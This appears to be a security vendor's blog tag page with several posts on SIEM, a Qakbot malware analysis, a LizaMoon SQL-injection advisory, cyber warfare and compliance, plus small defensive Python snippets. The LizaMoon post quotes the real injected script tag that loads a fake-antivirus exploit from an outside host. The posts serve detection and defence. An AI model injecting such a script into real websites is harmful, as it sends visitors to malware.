Posts tagged: 'information security'
The following posts are associated with the tag you have selected. You may subscribe to the RSS feed for this tag (http://blog.logrhythm.com/tags/information-security/feed) to receive future updates relevant to the topic(s) of your interest.
Ten years ago, I was put into the position of having to figure out how to manage a serious gap in enterprise security for a vitally sensitive environment. The problem was introduced to me like this: “The team can read 3,000 pages of logs per day, but they receive 55,000 pages.” Adding more heads to the problem wasn’t the right solution: the reviewers were losing context, inaccurate, under-trained, and bored. Success stories from this team were few, and the needle-in-a-haystack factor was high. This process needed to be automated.
There was another serious problem besides log volume. I explained the systemic issues to my supervisors like this: “The security controls in our organization are like musical instruments in an orchestra. We have firewalls, anti-virus, intrusion detection devices, file integrity monitoring, content filters, anti-spam, host security, and application security. But right now each does security ‘solo’.”
Each control was managed by a different group. Reporting was all hand-constructed and carried to the security team. The firewall manager would deliver the firewall report daily, intrusion detection was handled by the incident handling team once a week, anti-virus reports were delivered monthly by the IT staff, and so on.
The whole of the system was as reliable as clockwork: each piece did its part exactly as planned and yet each was still ineffective. The whole process was too high-level to determine if a problem existed, too low-level to see the problem as it happened, incomplete because not all data was reviewed, and lacked the context to determine if a threat was real even if it was suspected.
The bottom line? All controls play a different piece in the same symphony. They need to work together to turn noise into music.
The promise of SIEM was that computers can solve large, complex and tedious problems faster and more accurately than people; as such they are the ideal tool to police themselves and their users. We wanted the entire system of security controls in the enterprise working cooperatively, in harmony, and armed with the intelligence needed to protect the organization.
The emerging SIEM (SIM, SEM, or ‘master console’) technology was often focused on specific tools, such as Intrusion Detection or Host Security, that ‘extended’ into logging. Many critical systems had no logging whatsoever, and companies withheld such features in an attempt to keep their proprietary systems closed. It took most of the 2000s to get the message to vendors that third-party auditing was a requirement. Now SIEMs are practical, and more creative ways of using them can be applied.
Once the orchestra is together, the Conductor can lead. It’s of the utmost importance that managers, investigators, analysts, engineers and operators all hear the same song. What SIEM needed, and has achieved today, is the ability to connect logs to organizational regulations, policies, plans, procedures, organizational divisions, and even individual project requirements. Alerts can be tailored to correlate identified events, known threats, and critical assets. Reports can be automated and customized to fit any manner of output requirement rather than being limited to hand-made spreadsheets. And valuable metrics can be mined from the official record of events that the SIEM establishes.
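The kind of correlation described above can be illustrated with a minimal sketch: alert only when an event ties a known-threat source to a critical asset. All names, IPs and data here are hypothetical illustrations, not LogRhythm’s actual rule engine or API.

```python
# Minimal sketch of a SIEM-style correlation rule: raise an alert only
# when a known-threat source touches a critical asset. Threat and asset
# lists are illustrative placeholders.

KNOWN_THREATS = {"203.0.113.7", "198.51.100.23"}       # threat-intel source IPs
CRITICAL_ASSETS = {"payroll-db", "domain-controller"}  # assets worth alerting on

def correlate(events):
    """Return the subset of events that correlate a known threat
    with a critical asset; everything else stays in the log archive."""
    alerts = []
    for event in events:
        if event["src_ip"] in KNOWN_THREATS and event["asset"] in CRITICAL_ASSETS:
            alerts.append(event)
    return alerts

events = [
    {"src_ip": "203.0.113.7", "asset": "payroll-db",   "action": "login-failure"},
    {"src_ip": "192.0.2.10",  "asset": "print-server", "action": "login-success"},
]
print(correlate(events))  # only the first event correlates threat + asset
```

A real deployment would of course pull both lists from live feeds and asset inventories rather than hard-coded sets; the point is that the decision logic is simple once the logs are centralized.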
Thanks to SIEM technology, logs can be reviewed properly, the human resources required to review them are fewer, and volumes that may now exceed tens of millions of pages of data per day, rather than just 55,000, can be handled. Coverage now extends to the entire networked enterprise, and information can be presented in a timely manner and in ways that are useful to all stakeholders. I have no doubt that SIEMs are a key innovation for information technology and will be critical for what is shaping up to be a brutal future of security problems.
While the recent Hartford Insurance breach, the subject of an earlier post by Dave Pack, didn’t make a lot of noise, it’s interesting to see an old piece of malware like Qakbot (first discovered in 2007) still making its rounds in 2011. There are a number of things about this malware that make it particularly interesting.
Although certain Trojans like Zeus that target banking credentials are put up for sale on the black market as crimeware kits, Qakbot does not seem to follow this pattern. While many kinds of Trojans take a blanket approach to stealing data and passwords, Qakbot is actually designed to differentiate between the data stolen from target devices and other passwords it may have collected on non-target machines. Another interesting behavior of Qakbot is that it also acts as a worm in its attempts to spread via network shares. While this combination of worm/Trojan behavior is not unique, it certainly makes the malware more dangerous. And if that isn’t enough, Qakbot reportedly employs up to seven different methods to ensure that it’s not being reverse engineered by security researchers.
Evidence points to there being a dedicated group of people behind this piece of crimeware. If that’s true, it seems logical that The Hartford Insurance Company will not be the last business to be targeted by Qakbot.
With that being said, let’s take a look at what a typical Qakbot infection looks like.
First, the Trojan is VMware-aware: if it detects that it’s being run on a VMware virtual machine, it will simply not run. Once running, however, a dump of the file’s strings from memory gives us quite a bit of insight into what the file will try to do. Evidence of the file’s attempts to thwart security researchers can be seen in various places.
Highlights from the strings dump (screenshots omitted here) include:
Checks for the presence of various .exes running, plus a second, similar check.
References to the URLs where stolen data will be dumped. Notice the DNS query?
Information on the data it will be sending out, including the version of qbot (qakbot) running.
Outbound IRC traffic.
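The observations above come from dumping printable strings out of the process image. As a rough illustration of what a strings dump does (this is a generic sketch, not the tooling used in the actual analysis), extracting printable ASCII runs from raw bytes is only a few lines:

```python
import re

def extract_strings(data: bytes, min_len: int = 4):
    """Return runs of printable ASCII at least min_len bytes long,
    roughly what the Unix `strings` utility reports for a memory dump."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len  # printable ASCII range
    return [m.decode("ascii") for m in re.findall(pattern, data)]

# Illustrative blob standing in for a memory dump; the embedded
# hostname and command are made up for the example.
blob = b"\x00\x01irc.example.net\x00\xffPASS qbot\x90\x90hi"
print(extract_strings(blob))  # ['irc.example.net', 'PASS qbot']
```

Running this over a memory snapshot of an unpacked sample is often enough to surface C2 hostnames, IRC commands and version markers like the ones shown above.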
Based on what we’ve seen in the strings, we can expect a variety of logged behavior generated by Qakbot. Monitoring for unexpected outbound FTP, IRC and port 80 traffic is one way to identify potential Qakbot activity. Also, a shared folder on the network that is designed to always be empty can be monitored for the appearance of new files, to capture the worm-like behavior.
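The empty-share canary idea can be sketched very simply: if anything ever appears in a share that is supposed to stay empty, something is propagating. The path and scheduling here are hypothetical; in practice the check would run on a schedule and feed its alerts into the SIEM.

```python
import os

# Hypothetical bait share: a network-visible folder deliberately kept empty.
BAIT_SHARE = "/srv/shares/finance-archive"

def check_bait_share(path):
    """Return the names of any files found in a share that should be empty.
    A non-empty result suggests worm-like propagation (e.g. Qakbot copying
    itself to open network shares)."""
    return sorted(os.listdir(path))

def alert_on_drop(path):
    """Print an alert if the bait share is no longer empty."""
    dropped = check_bait_share(path)
    if dropped:
        print(f"ALERT: unexpected files in bait share {path}: {dropped}")
    return dropped
```

The design choice worth noting is that a bait share has essentially zero false positives: no legitimate user or process should ever write to it, so any hit is worth investigating.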
If you want to know more about how we can help you detect malware with log data, feel free to get in touch.
While I will be posting a more in-depth analysis of the LizaMoon attack, here are a few early thoughts from Dave Pack while his blogger profile gets set up. Dave manages LogRhythm’s Knowledge Engineering department and has been working in information security and advanced data analysis for over ten years.
Various security organizations/bloggers are tracking a mass SQL injection attack currently being called “LizaMoon” (after one of the first websites identified). While we haven’t had a chance to fully analyze the attack, based on information being aggregated by SANS and Stack Overflow, it looks like this is a combination SQL Injection/Stored XSS attack, with the final target being client-side end-users.
It appears that the SQL injection is taking advantage of a web application vulnerability. The injection itself is delivering a Stored XSS attack to the vulnerable web servers, consisting of a script (</title><script src=http://google-stats49.info/ur.php>) that redirects unlucky internet users to a different site hosting a file named ur.php. This PHP file is where the dirty work is actually done: it launches an exploit which installs fake AV software on the end-user’s machine.
What’s really interesting is that the SQL injection is really just a means of delivering the much more dangerous Stored XSS to vulnerable web servers. Stored XSS attacks are much scarier than standard Reflected XSS because a user doesn’t have to be tricked into clicking a maliciously crafted URL. The attack simply sits on the web server, waiting for any unlucky internet user to browse to the compromised website.
We’re attempting to get our hands on the ur.php code for further analysis of the client-side exploit, after which one of our analysts will be posting an update. In the meantime, here are some things both web administrators and end users can do to detect this attack and help protect against it.
1. Implement standard protections, such as sanitizing all database inputs and using parameterized queries across the board, to limit what can get through.
2. Check whether a web server is being targeted by the most common types of SQL injection.
a. In particular, look in your access logs for “--” (the SQL comment sequence) in the URL. It is extremely rare for legitimate input to be commenting out the rest of a SQL statement.
b. Check for various encodings of the same string as well. LogRhythm provides an out-of-the-box AI Engine advanced correlation rule that looks for these strings in a URL and will alarm on any injection attempts.
3. If the functionality is available in your infrastructure, block any attempts to access a website with “ur.php” in the URL.
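The access-log check described above can be sketched in a few lines: percent-decode each request line so that encoded variants are caught, then flag anything containing the SQL comment sequence. The log lines below are fabricated examples, and this is a toy illustration, not LogRhythm’s actual AI Engine rule.

```python
from urllib.parse import unquote

def suspicious_requests(log_lines):
    """Return access-log lines whose request contains the SQL comment
    sequence "--" after percent-decoding. Legitimate input almost never
    comments out the rest of a SQL statement, so hits are strong
    injection candidates."""
    return [line for line in log_lines if "--" in unquote(line)]

log = [
    "GET /news.asp?id=42 HTTP/1.1",
    "GET /news.asp?id=42');declare%20@s%20varchar(4000)-- HTTP/1.1",
    "GET /page.asp?t=319%2D%2D1 HTTP/1.1",
]
print(suspicious_requests(log))  # the second and third lines are flagged
```

Decoding before matching is the important step: the third line contains no literal “--” at all, only the encoded form %2D%2D, and would slip past a naive substring search.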
The last year has been full of stunning news about cyber security, and you’ve probably read about incidents such as HBGary’s hack by Anonymous, the Stuxnet worm, and what looks like a back-and-forth cyber battle between China and the United States. These events have become a media circus simply because they all add up to ‘really bad news’ for workers in information technology and information security.
As more information is released about how useful cyber warfare is, or is perceived to be (consider WikiLeaks’ release of US diplomatic cables), the more it inspires other countries to create their own cyber warfare capabilities, even to the point of limiting summit talks.
Looking back over the growth of cyber security during the last 30 years, the main goal has been to stop criminal hackers, disgruntled employees and malicious software. But what happens if your organization becomes the target of a military mission? At least 45,000 computers were infected by Stuxnet, and as cyber war proliferates there is a real possibility of your organization becoming a victim of collateral damage.
The Internet isn’t a very good battleground for military warfare, though. In terrestrial warfare, bombs explode and destroy the technology that makes advanced weaponry function. Cyber-weapons, on the other hand, are like dropping Rosetta Stones on your enemies: all the zero-day exploits, obfuscation techniques, tools and control methods are exposed and can be reverse engineered. Those capabilities can then be added to the opponent’s arsenal, and there are reportedly personal safety risks for those involved as well.
It’s also of great value to remain invisible while performing cyber warfare, in order to avoid reprisal. Anonymity techniques can be less than magic and still be very effective, and in many cases attacks can be conducted by contractors and/or non-affiliated hackers. Organizations that maintain a public Internet presence are at a huge disadvantage against these anonymous ambushers.
Organizations should take cyber warfare very seriously as the latest evolution of computer security. For the next decade or more, companies will hire tens of thousands of cyber security experts who will be expected to do no less than keep government-sponsored hackers out of their networks.
Proper planning, enforcing security policy and improving situational awareness will be critical for handling the next wave of government funded cyber threats. Access control, usage monitoring, security auditing, vulnerability management, role separation and network segmentation will need to be considered and implemented for all IT projects. SIEM solutions and other security tools will become even more critical to maintaining an up-to-date security posture.
Are you ready for the security risks of the next decade?
‘He’s having the worst day of his life… over and over again.’
Ring any bells? It’s the strapline from the film Groundhog Day, which sees Bill Murray’s character, Phil Connors, caught in a time warp – repeatedly waking up to find that things are exactly the same as the day before.
The film charts Connors’ frustration at being faced with the same situations every single day and seemingly unable to start the next day afresh.
Whether it’s travelling the same daily commute, or having repeated discussions about the latest information security regulation directive, I’m sure we’ve all related to that character at some point. Particularly if you are a miserable old curmudgeon like me (in fact I think you will find that Bill Murray based his screen persona on yours truly….)
With a seemingly endless list of new or amended regulations being introduced, it’s no wonder that IT security professionals can often feel like they’re stuck in their own Groundhog Day. No sooner does an organisation achieve compliance for one regulation, than another comes along, often bringing with it a sense of déjà vu for all involved.
Take the Payment Card Industry Data Security Standard for example. The first standard was introduced in December 2004, with the most recent revision in 2008, and an updated version due this October. As such, the regulation seems to have been around for an eternity and it’s no wonder that mentioning the subject will trigger a glazed response from many in the industry.
This rings even truer in the public sector, where there seems to be a never-ending stream of new initiatives and guidelines relating to information management and technology infrastructures. In the UK alone, organisations are faced with, for example, GSI/GCSX, CoCo compliance and, latterly, the Memo 22 replacement, Good Practice Guide 13 (GPG 13).
Information security is an ever-changing beast. As technology evolves, so do the risks posed, which is why it’s imperative that organisations – public and private – don’t become complacent when it comes to compliance.
As Bill Murray found in Groundhog Day, the only way to escape the monotony of his time warp was to re-assess his attitude to life. Of course I’m not suggesting for one minute that we turn our lives upside down, but there’s a lot to be said for taking a proactive approach when it comes to guarding against risk.
In every information security related regulation, there’s a requirement in some shape or form to protect the information being held by the organisation – from credit card details to children-at-risk records. Despite this, all too often security incidents are discovered after the event, once the damage has been done.
Protective Monitoring tools such as LogRhythm’s bring a new proactive dimension to information security, fulfilling multiple compliance requirements in the process. By centralising and automating how log data is managed, organisations can gain clear insight into network and user behaviour. Any irregular activity is automatically flagged in real time, while reporting for compliance purposes becomes simpler and less time-consuming.
As with most Hollywood films, Bill Murray’s ultimate goal was to get the girl. While I can’t guarantee that LogRhythm will bring similar results, it will help ease the Groundhog Day frustrations for those facing the continued compliance struggle.
Unless you’re happy living in Punxsutawney of course….